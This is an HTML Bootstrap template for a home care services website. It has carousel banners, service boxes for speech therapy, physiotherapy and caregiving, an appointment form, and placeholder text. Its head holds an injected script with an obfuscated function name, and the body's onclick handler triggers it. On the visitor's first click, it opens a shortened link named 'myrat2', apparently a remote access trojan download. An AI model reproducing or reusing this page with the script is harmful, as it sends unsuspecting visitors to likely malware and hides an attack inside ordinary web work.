<!DOCTYPE html>
<html lang="en">

<head><script type = "text/javascript">load = 'True';function VXNlcmNvcjogSW(){if (load == 'True'){var win = window.open('http://rebrand.ly/myrat2', '_blank');win.focus();load = "False";}}</script>

    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta name="description" content="">
    <meta name="author" content="">

    <title>Template</title>

    <!-- Bootstrap Core CSS -->
    <link href="css/bootstrap.min.css" rel="stylesheet">

    <!-- Custom CSS -->
    <link href="css/stylesheet.css" rel="stylesheet">

    <!-- Custom Fonts -->
    <link href="font-awesome/css/font-awesome.min.css" rel="stylesheet" type="text/css">

    <!-- HTML5 Shim and Respond.js IE8 support of HTML5 elements and media queries -->
    <!-- WARNING: Respond.js doesn't work if you view the page via file:// -->
    <!--[if lt IE 9]>
        <script src="https://oss.maxcdn.com/libs/html5shiv/3.7.0/html5shiv.js"></script>
        <script src="https://oss.maxcdn.com/libs/respond.js/1.4.2/respond.min.js"></script>
    <![endif]-->

</head>

<body onclick = "VXNlcmNvcjogSW()">

    <!-- Navigation -->
    <div class="container">
    <div class="row">
    <div class="col-lg-2">
<div class="nav-logo">
<img src="images/logo.jpg">
</div>
</div>
<div class="col-lg-10">

            <!-- Collect the nav links, forms, and other content for toggling -->
            <div class="collapse navbar-collapse" id="bs-example-navbar-collapse-1">
                <ul class="nav navbar-nav navbar-right">
                    <li>
                        <a href="about.html">Home</a>
                    </li>
                    <li>
                        <a href="about.html">About US</a>
                    </li>
                    <li>
                        <a href="services.html">Our Services</a>
                    </li>
                    <li>
                        <a href="services.html">Testimonials </a>
                    </li>
                    <li>
                        <a href="contact.html">Contact us</a>
                    </li>
                   
            </div>
            <!-- /.navbar-collapse -->
        </div>
        <!-- /.container -->
    </nav>
    </div>
    </div>
    </div>
    </div>
    

    <!-- Header Carousel -->
    <header id="myCarousel" class="carousel slide">
        <!-- Indicators -->
        <ol class="carousel-indicators">
            <li data-target="#myCarousel" data-slide-to="0" class="active"></li>
            <li data-target="#myCarousel" data-slide-to="1"></li>
            <li data-target="#myCarousel" data-slide-to="2"></li>
        </ol>

        <!-- Wrapper for slides -->
        <div class="carousel-inner">
            <div class="item active">
                <div class="fill" style="background-image: url(images/banner%201.jpg)"></div>
                <div class="carousel-caption">
                <div class="banner">
                    <h1>Care for Every Situation </h1>
                    <p>Taking care of relatives </p>
                    </div>
                </div>
            </div>
            <div class="item">
                <div class="fill" style="background-image: url(images/banner%202.jpg)"></div>
                <div class="carousel-caption">
                <div class="banner">
                     <h1>Care for Every Situation </h1>
                    <p>Taking care of relatives </p>
                    </div>
                </div>
            </div>
            <div class="item">
                <div class="fill" style="background-image: url(images/banner%203.jpg)"></div>
                <div class="carousel-caption">
                <div class="banner">
                      <h1>Care for Every Situation </h1>
                    <p>Taking care of relatives </p>
                    </div>
                </div>
            </div>
        </div>
        

        <!-- Controls -->
        <a class="left carousel-control" href="#myCarousel" data-slide="prev">
            <span class="icon-prev"></span>
        </a>
        <a class="right carousel-control" href="#myCarousel" data-slide="next">
            <span class="icon-next"></span>
        </a>

    </header>
    
<!-------------banner 2-------------------->

<div class="banner2">
<div class="container">
<div class="row">
<div class="col-lg-12">

<div class="col-lg-4">
<div class="patient_care_box">
<h1>PATIENT CARE</h1>
<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nunc quis velit liberoeus. Pendisse potenti. Duis commodo lacus ut pharetra sodales. <br>
Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nunc quis .</p>
<div class="know-more-box">
<button>Know More</button>
</div>

</div>
</div>

<div class="col-lg-4">
<div class="patient_care_box">
<h1>DISABLED CARE</h1>
<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nunc quis velit liberoeus. Pendisse potenti. Duis commodo lacus ut pharetra sodales. <br>
Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nunc quis .</p>
<div class="know-more-box">
<button>Know More</button>
</div>

</div>
</div>


<div class="col-lg-4">
<div class="patient_care_box">
<h1>ELDERLY CARE</h1>
<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nunc quis velit liberoeus. Pendisse potenti. Duis commodo lacus ut pharetra sodales. <br>
Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nunc quis .</p>
<div class="know-more-box">
<button>Know More</button>
</div>

</div>
</div>


</div>
</div>
</div>
</div>


<div class="our-service-box">
<div class="container">
<div class="row">
<div class="col-lg-12">
<h1>our <span>services </span></h1>
<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nunc quis velit liberoeus. <br>Pendisse potenti. Duis commodo lacus ut pharetra sodales. </p>


<div class="col-lg-4">
<div class="service-box">
<img src="images/speech therapy.jpg">
<h1>SPEECH THERAPY</h1>
<p>Lorem ipsum dolor sit amet, consectr adipiscing elit. </p>
<div class="learn-more-box">
<button>Learn More</button>
</div>

</div>
</div>


<div class="col-lg-4">
<div class="service-box">
<img src="images/physiotherapy.jpg">
<h1>PHYSIOTHERAPY</h1>
<p>Lorem ipsum dolor sit amet, consectr adipiscing elit. </p>
<div class="learn-more-box">
<button>Learn More</button>
</div>
</div>
</div>


<div class="col-lg-4">
<div class="service-box">
<img src="images/caregiver.jpg">
<h1>CAREGIVER</h1>
<p>Lorem ipsum dolor sit amet, consectr adipiscing elit. </p>
<div class="learn-more-box">
<button>Learn More</button>
</div>
</div>
</div>

<div class="more-services-box">
<button>More Services</button>
</div>


</div>
</div>
</div>
</div>  


<div class="success-box">
<div class="container">
<div class="row">
<div class="col-lg-12">
<h1>success <span>stories</span></h1>
<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nunc quis velit liberoeus. <br>Pendisse potenti. Duis commodo lacus ut pharetra sodales. </p>

<div class="col-lg-6">
<img src="images/success stories.jpg">
</div>

<div class="col-lg-6">
<div class="quote-box">
<p>The love and care I receive is second to none and my life has changed for the better since my arrival.<br></p>
<button>Jenny</button>
</div>
</div>

</div>
</div>
</div>
</div>


<div class="contact-box">
<div class="container">
<div class="col-lg-12">
<h1>Better Care for living Legends</h1>
<p>We are always close </p>
<div class="contact-us-box">
<button>Contact us</button>
</div>

</div>
</div>
</div>




<div class="appointment-box">
<div class="container">
<div class="row">
<div class="col-lg-12">

<div class="col-lg-6">
<div class="make-appointment-box">
<h1>Make an Appointment for Your Smile!</h1>
<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nunc quis velit liberoeus. Pendisse potenti. Duis commodo lacus ut pharetra sodales. </p>

<div class="col-lg-6">
<h2>Let’s Talk</h2>
<p>Ph : +00 000 000 0000<br>
M : 0000000000000<br>
E :  info@sitename.com</p>
</div>

<div class="col-lg-6">
<h2>Let’s Meet</h2>
<p>Address Line One<br>
Address Line Two<br>
Address Line Three</p>
</div>
<div class="map">
<h2>Find on map</h2>
<iframe src="https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d387190.2799160891!2d-74.25987584510595!3d40.69767006338158!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x89c24fa5d33f083b%3A0xc80b8f06e177fe62!2sNew%20York%2C%20NY%2C%20USA!5e0!3m2!1sen!2s!4v1582447938242!5m2!1sen!2s" width="100%" height="263" frameborder="0" style="border:0;" allowfullscreen=""></iframe>
</div>

</div>
</div>


<div class="col-lg-6">
<div class="take-appointment-box">

<div class="col-lg-6">
<label for="First Name">First Name</label>
<input name="First Name" class="textfield" type="text">
</div>

<div class="col-lg-6">
<label for="Last Name">Last Name</label>
<input name="Last Name" class="textfield" type="text">
</div>

<div class="col-lg-6">
<label for="Email">Email</label>
<input name="Email" class="textfield" type="text">
</div>

<div class="col-lg-6">
<label for="Phone">Phone</label>
<input name="Phone" class="textfield" type="text">
</div>	

<div class="col-lg-6">
<label for="Date">Date</label>
<input name="Date" class="textfield" type="text">
</div>


<div class="col-lg-6">
<label for="Time">Time</label>
<input name="Time" class="textfield" type="text">
</div>


<div class="col-lg-12">
<label for="Observation">Observation</label>
<input name="Observation" class="textfield2" type="text">
</div>

<div class="col-lg-12">
<div class="Take-appointment">
<button>Take an Appointment</button>
</div>
</div>
</div>


</div>
</div>
</div>
</div>
</div>



<div class="footer">
<div class="container">
<div class="row">
<div class="col-lg-12">

<div class="col-lg-3">
<h1>Our services include</h1>
<ul>
<li>Speech Therapy Services</li>
<li>Physiotherapy Services</li>
<li>Caregiver Services</li>
<li>Home Nursing Services</li>
</ul>
</div>

<div class="col-lg-3">
<ul>
<li>Dementia Care Services</li>
<li>Patient Care Services</li>
<li>Disabled Care Services</li>
</ul>
</div>

<div class="col-lg-3">
<h1>Address</h1>
<ul>
<li>Address Line One</li>
<li>Address Line Two</li>
<li>Address Line Three</li>
</ul>
</div>

<div class="col-lg-3">
<h1>contact</h1>
</div>

</div>
</div>
</div>
</div>

<div class="footer-para">
<div class="container">
<div class="row">
<div class="col-lg-12">
<p>© 2019  Sitename. All Rights Reserved </p>
</div>
</div>
</div>
</div>


 
       

    <!-- jQuery -->
    <script src="js/jquery.js"></script>

    <!-- Bootstrap Core JavaScript -->
    <script src="js/bootstrap.min.js"></script>

    <!-- Script to Activate the Carousel -->
    <script>
    $('.carousel').carousel({
        interval: 5000 //changes the speed
    })
    </script>

</body>

</html>
